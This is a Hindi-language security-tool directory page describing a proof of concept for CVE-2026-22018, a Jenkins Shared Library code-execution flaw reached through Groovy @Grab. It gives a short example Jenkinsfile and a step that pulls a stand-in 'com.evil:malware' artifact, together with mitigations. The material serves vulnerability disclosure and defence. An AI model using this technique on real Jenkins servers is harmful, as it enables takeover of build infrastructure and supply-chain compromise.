Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/george0papasotiriou/cve-2026-22018-jenkins-pipeline-shared-library-code-execution-via-grab-
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणDevSecOpsआपूर्ति श्रृंखला सुरक्षा
GitHubgeorge0papasotiriou/cve-2026-22018-jenkins-pipeline-shared-library-code-execution-via-grab-

CVE-2026-22018-Jenkins-Pipeline-Shared-Library-Code-Execution-via-Grab-

CVE-2026-22018 के लिए PoC, जो Groovy @Grab के माध्यम से एक गंभीर Jenkins Pipeline Shared Library RCE है, जो सप्लाई-चेन कोड इंजेक्शन और शमन चरणों को प्रदर्शित करता है।

रिपॉजिटरी देखें
101 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-22018 – Jenkins Pipeline Shared Library में @Grab के माध्यम से कोड निष्पादन

प्रोग्राम कोड (Groovy pipeline)

// Jenkinsfile - loads untrusted shared library
@Library('evil-library@master') _
node {
    evilStep()
}

CVE-2026-22018 – Jenkins Pipeline Shared Library में रिमोट कोड निष्पादन

Severity: Critical

अवलोकन

एक Jenkins pipeline ऐसे स्रोत से shared library लोड करती है जिस पर पूरी तरह से भरोसा नहीं किया जाता है। लाइब्रेरी बाहरी Maven artifacts को डाउनलोड करने के लिए @Grab एनोटेशन का उपयोग करती है, जिसमें एक दुर्भावनापूर्ण क्लास शामिल हो सकती है जो Groovy संकलन के दौरान Jenkins controller पर कोड निष्पादित करती है।

भेद्यता विवरण

  • प्रकार: कोड इंजेक्शन / सप्लाई चेन
  • प्रभाव: Jenkins कंट्रोलर का पूर्ण समझौता।
  • मूल कारण: Groovy का @Grab एनोटेशन runtime पर मनमाने JARs को लाता और लोड करता है; shared libraries सैंडबॉक्स नहीं होती हैं।

शोषण प्रदर्शन

ऐसी अविश्वसनीय लाइब्रेरी के साथ pipeline कॉन्फ़िगर करें जिसके vars/evilStep.groovy में @Grab('com.evil:malware:1.0') शामिल है। जब pipeline चलती है, तो दुर्भावनापूर्ण JAR का static initializer निष्पादित होता है।

शमन

  • केवल विश्वसनीय, हस्ताक्षरित SCM रिपॉज़िटरीज़ से shared libraries का उपयोग करें।
  • Groovy सैंडबॉक्स सुरक्षा सेटिंग्स के माध्यम से @Grab अक्षम करें।
  • “Load implicitly” pipeline विकल्प का सावधानीपूर्वक उपयोग करें।

इंस्टॉलेशन और उपयोग

git clone https://github.com/yourorg/CVE-2026-22018.git
cd CVE-2026-22018
# Set up Jenkins in a lab environment to test.
टूल डाउनलोड करें